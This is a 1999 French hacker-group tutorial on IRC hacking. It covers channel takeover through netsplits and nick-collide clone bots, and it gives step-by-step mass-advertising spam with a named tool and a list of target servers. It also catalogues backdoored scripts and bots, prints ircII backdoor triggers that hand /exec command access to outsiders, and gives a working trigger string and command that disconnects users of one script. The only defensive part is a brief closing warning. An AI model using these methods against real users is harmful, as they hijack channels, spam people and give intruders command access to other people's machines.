IRC Hack tutorial
Texte par bLuReD75
17/05/99 
Salut à tous,
voici un petit tutoriel pour vous donner un apperçu du hacking sur irc.

I. Devenir chanop.
Tout d'abord il faut vous procurer les 3 logiciels suivant, ou outils similaires, 
disponibles gratuitement sur internet :
Lice (client irc permettant l'usage intensif de script)
MCB (multide collide bot)
LL (link looker)

je vais vous parler de 2 méthodes pour hacker un channel:
1ère méthode : se faire connaitre et demander. Cependant, ça peut prendre du temps.
2ème méthode : créer des coupures

1) no comment for the moment.
2) tout d'avord voici quelques définitions:
le split : le serveur sur lequel on est connecté se détache du reste du net.

Donc il est possible quitter le channel et d'y réentrer pour se voir octroyer les 
droits des chanops. Cependant, ceci est rarement possible étant donné que pratiquement 
tout les channels ont des bots.

Les bots ou robots : scripts créés par les chanop pour maintenir leur présence sur le 
serveur et fournir des accès privilégiés aux utilisateurs connus.

Pour être plus efficace, vous devez utiliser MCB ou tout autre utilitaire similaire. 
Il créé un clone d'un pseudonyme que tu veux killer, souvent un op du channel. Il 
suffit de renseigner MCB avec les nicks à cloner ainsi que les serveurs qui ont 
splittés (visible grâce à Link Looker qui t'envoi les noms des channels qui ont splittés).


II. faire du massadvertising sur irc
Télécharger massirc.exe [26.6k] vous aurez peut être aussi besoin de cswsock.vbx.
Exécutez le vous allez avoir un écran du même type que mirc. Attention, ne le 
remplissez pas avec les même infos que celles utilisées habituellement sur votre client irc.

Ceci ne fonctionne qu'avec certains serveurs. Voici une liste non exhaustive :
us.undernet.org
us.chatnet.org
us.icenet.org
irc.aohell.org
home.metnet.com
irc.pontocom.com.br
atlanta.ga.us.galaxynet.org
ocean.us.austnet.org
irc2.sodre.net 
sunrise.ca.us.another.net 
Shadow.FL.US.EarthInt.Net
rochester.mi.us.starlink.org 
us.dal.net 

Rentrez le nom du serveur désiré. Appuyer 2 fois sur Next. Ensuite, vous devez voir 
plusieurs options, en voici les détails :
- Send Notice Messages : ceci avertit chaque utilisateur sur le serveur avec votre message
- Send PrivMsg : envoi un message privé à chaque utilisateur sur le serveur
- Send Invite : Envoi une invitation sur tous les channel du serveur vers un channel précis
- Randomly : change votre nickname toutes les 10 secondes
- Send 1 packet every seconds : ce champs doit être paramètrer avec un nombre entre 5 et 8. 
  Ceci pour éviter de vous faire flooder par le serveur.
- Start Sending Nick with letter : commencer l'envoi aux nick commençant 
  par la lettre sélectionnée.
- La boite blanche à côté est à renseigner avec le nom du channel où vous 
  voulez que les personnes viennent.

Clicker sur 'Send now' et minimisez la fenêtre. Et boilà :)



III. Bugs et backdoor sur les clients irc, scripts et robots
1- Qu'est ce qu'une backdoor ?
Une backdoor est une caractéristique d'un programme qui peut être utilisé d'une façon 
à la faire agir autrement que la personne qui l'exécute s'y attend.
Tous les programmes d'irc, bots et scripts peuvent avoir des backdoors.

Un point important à noter est que certaines backdoor sont intentionnelles et d'autres pas. 
En particulier avec les scripts irc II, le problème est que ircII n'est pas un langage 
de programmation clair de même que sh/csh (utilisés dans les commandes /EXEC), et il 
est facile pour quelqu'un qui ne comprend pas ce qu'il fait de mettre des backdoor non 
désirées. Dans les clients et robots qui sont généralement écrits en C, les bugs sont plus 
durs à trouver et à exploiter. La limite entre une backdoor non intentionnée et un bug est 
très fine, j'appelerai backdoor si il peut être utilisé pour que le bot exécute quelque 
chose de spécifique, et un bug si il peut être utilisé pour faire déconnecter le client 
ou le bot. Nous parlerons alors de 'ping timeout' et d'excess flooding. 

2- Comment une backdoor peut-elle être dangeureuse ?
Une backdoor peut être plus ou moins "puissante", selon l'accès aux caractéristiques de 
votre client et/ou compte qu'il donne à l'intrus.
Dans les pires des cas, une backdoor laissera l'intrus exécuter arbitrairement des 
commandes sur la machine de votre client ou robot qui est en mache, permettant l'accès 
complet à votre compte. Ceci permet à l'intrus de compromettre la sécurité de votre 
système, en crackant des mot de passe entre autres. Il peuvent aussi vous faire envoyer 
du courrier et poster sur usenet, j'appelerai celà, donner un acès unix.

Dans d'autres cas, la backdoor permettra à l'intru de contrôler votre client IRC, lui 
faisant exécuter toutes les possibilités de l'irc comme venir dans des channels, parler 
à l'intérieur de ceux-ci, vous déconnecter, ou /kill quelqu'un si vous êtes un chanop. 
J'appelerai ceci donner l'accès IRC.

Et dans quelques cas, la backdoor permettra seulement de laisser quelqu'un faire des 
choses spécifiques. Le cas le plus courrant est de vous déconnecter d'IRC.

En résumé, les backdoor non intentionnelles et les bugs permettront soit de donner un 
accès unix complet, soit un accès IRC soit la possibilité de déconnecter le client.



3- Quels sont les scripts, clients et robots qui possèdent des backdoors ?
* iNFiNiTY, toolZ, UltBox (et probablement d'autres scripts) ont une backdoor 
  (qui donne l'accès Unix à n'importe qui).
* Les premières version de GargOyle ont des backdoor non intentionnelles 
  (supposé volées d'autres scripts) et donnent un accès unix et IRC à n'importe qui.
* Quelques version de PhoEnix ont une backdoor non intentionnelle qui permet 
  de vous déconnecter.
* Pillow Fighter II possède une backdoor non intentionnelle qui donne l'accès Unix 
  et IRC à n'importe qui.
* Stealth possède au moins 2 backdoor non intentionnelles, dont une donne accès à 
  Unix et IRC à n'importe qui, et l'autre permet à 'nimporte qui de vous déconnecter.
* Quelques (anciennes) versions d'Axis ont une backdoor qui permet à certaines 
  personnes d'avoir un accès Unix et IRC, et une autre qui laisse l'intrus devenir chanop.
* Quelques versions (hackées ?) du script VeVeS ont une backdoor non intentionnelle 
  qui donne l'accès Unix et IRC à n'importe qui.
* ircOP.irc est un script cheval de trois (il ne fait RIEN d'utile pour vous) qui efface 
  tout vos fichiers, ouvre votre compte à n'importe qui.
* Queleques versions (hackées ?) du robot ComBoy ont une backdoor non intentionnelle qui 
  donne l'accès IRC à tout le monde.
* Le bot eggdrop, si il est mal configuré, peut donner l'accès Unix à n'importe qui avec 
  l'accès privilégié au bot. * Tous les VladBots, ComBot, HackBots, Kn1ghtBots, DweebBots, 
  StelBots et robots similaires peuvent être 'killés' (segmentation fault, bus error, 
  ou ping timeout) avec plus ou moins de difficultés (et sans les flooder)
* Quelques vielles version hackées d'ircII 2.2.9 ont une backdoor qui donne à n'importe 
  qui un accès Unix et IRC. Ceci a été l'objet d'une mise en garde du CERT.
* Les vielles versions d'ircII (antérieures à la 2.3.x-beta) ont un bug dans filtrage des 
  séquences d'échapement qui permet aux chanop de brouiller votre écran.
* Les vielles versions d'ircII (antérieures à la 2.6) ont un bug dans le DCC 
  permettant à quelqu'un de vous faire un ping timeout une fois que votre connection 
  DCC est ouverte.
Ceci n'est pas une liste exhaustive. Il existe des tonnes de scripts.



4- Comment fonctionne une backdoor ?
En ircII, les backdoor sont basées sur les instruction /on comme celles-ci :
4.1. /on ^ctcp "% % BACKDOOR *" $3-
4.2. /on ^notice "% BACKDOOR *" $2-
4.3. /on ^ctcp "% % BACKDOOR *" quote $3-
4.4. /on ^ctcp "% % DCC SEND % *" exec -name stuff ls $5
4.5. /on -notice "% STUFF*" eval ^assign blah $3-

Les backdoor 4.1 et 4.2 sont apparemment voulues, et donnent à n'importe qui un accès 
IRC et Unix en envoyant des commanndes /EXEC.
La backdoor 4.3 est certainement voulue aussi, elle donne un accès IRC seulement.
La backdoor 4.4 est un bug non intentionnel, mais il donne un accès Unix complet à 
tout le monde (savez vous que la commande ^ est interprétée comme | sur SunOs s'il utilise sh ?)
Avec la 4.5, le problème est l'évaluation, mais une fois encore, puisqu'ircII permet 
d'exécuter le contenu de variables sans les évaluer, chercher toutes les évaluations 
et tous les /on and tous les /exec n'est pas très efficace pour être sur qu'un script 
ne contient aucune backdoor.

Je finirais ce chapitre avec un vrai example de backdoor, pour les plus sceptiques, 
qui est tiré du script de Stealth :
alias qwrrw { 
/echo [^BFate^B] T'es morte ma biche 
/signoff Je suis un crétin, et j'arrête de vous prendre la tête, je me casse}

on ^notice "% 53764^B^B856324^B^B32fd563gf^Vds5rx^B^Bfdtsr5ss54" {/qwrrw}

Donc si quelqu'un exécute Stealth, tout ce que vous avez à faire est de taper 
/notice nickname 53764^B^B856324^B^B32fd563gf^Vds5rx^B^Bfdtsr5ss54
et cete personne sera déconnectée.

Conclusion, je vais pas jouer les paranos mais faites gaffes sur irc éviter de télécharger 
des scripts ou alors vérifiez les scrupuleusement ;)

¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø

______________________________________________________________________________________________
¡¢£¤¥ ¦§¨©ª«¬­®¯°±²³´µ·¸¹º»¿øØÞþæ¡¢£¤¥ ¦§¨©ª«¬­®¯°±²³´µ·¸¹º»¿øØÞþæ¡¢£¤¥ ¦§¨©ª«¬¡¢£¤¥ ¦§¨©ª«¬­
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
                               -<\________________________/>-
   ~~    ~~    ~~    ~~    ~~°ºØø¦    ¿<H A C K 0 F F>?   ¦øØº°~~    ~~    ~~    ~~    ~~    
~~    ~~    ~~    ~~    ~~    ~-</¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\>-~    ~~    ~~    ~~    ~~    ~~
   ~~    ~~    ~~    ~~    ~~    ~ http://come.to/legang  ~~   ~~    ~~    ~~    ~~    ~~    
~~    ~~    ~~    ~~    ~~    ~~    ~                  ~    ~~    ~~   ~~    ~~    ~~     ~~
   ~~    ~~    ~~    ~~    ~~    ~ http://come.to/yopyop  ~~   ~~    ~~    ~~    ~~    ~~    
~~    ~~    ~~    ~~    ~~    ~~    ~                  ~    ~~    ~~   ~~    ~~    ~~     ~~     
   ~~    ~~    ~~    ~~    ~~  http://members.tripod.com/cakeii ~    ~~    ~~    ~~    ~~   
~~    ~~    ~~    ~~    ~~    ~                              ~    ~~    ~~    ~~    ~~    ~~
   ~~    ~~    ~~    ~~    ~ http://members.tripod.com/hackoolic ~    ~~    ~~    ~~    ~~   
~~    ~~    ~~    ~~    ~~    ~                              ~    ~~    ~~    ~~    ~~    ~~
.........Des commentaires, des questions, des insultes, ecrivez aux membres du gang.........
______________________________________________________________________________________________
¡¢£¤¥ ¦§¨©ª«¬­®¯°±²³´µ·¸¹º»¿øØÞþæ¡¢£¤¥ ¦§¨©ª«¬­®¯°±²³´µ·¸¹º»¿øØÞþæ¡¢£¤¥ ¦§¨©ª«¬¡¢£¤¥ ¦§¨©ª«¬­
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
        		    ,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,
			    _____________________________________
			    (((((((      H@CK-OFF !!     ))))))))
			     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
			    ~  ~   ¤º°`°º   ¤º°`°º   ¤º°`°º  ~  ~ 
			     ~  ~  | SE | - | RI | - | AL | ~  ~ 
			    ~  ~   | SA | - | VA | - | TE |  ~  ~ 
			     ~  ~  | SY | - | ST | - | EM | ~  ~ 
			    ~  ~   ø,¸¸,ø   ø,¸¸,ø   ø,¸¸,ø  ~  ~ 
			     Cakeii - Tobozo - Yopyop - Silk - Nk
			            Sniffdoz - Aolshame
			     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
			                             {    \|/    
			     >http://come.to/legang  8  -- * --
			     >silk@silk.cut          {    /|\  
			     cakeii@usa.net 
			     nk01@n0past.com 
			     tobozo@biosys.net 
			     misto@bigfoot.com
			     sniffdoz@yahoo.com
			     yopyop@webmails.com
			     blured75@hotmail.com
			     aolshame@softhome.net
                             emminence@earthling.net
		        ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,    
		       /   O o          O o          O o    \   
		       \    O            O            O     /   
		        º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º     
		    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[EOF]
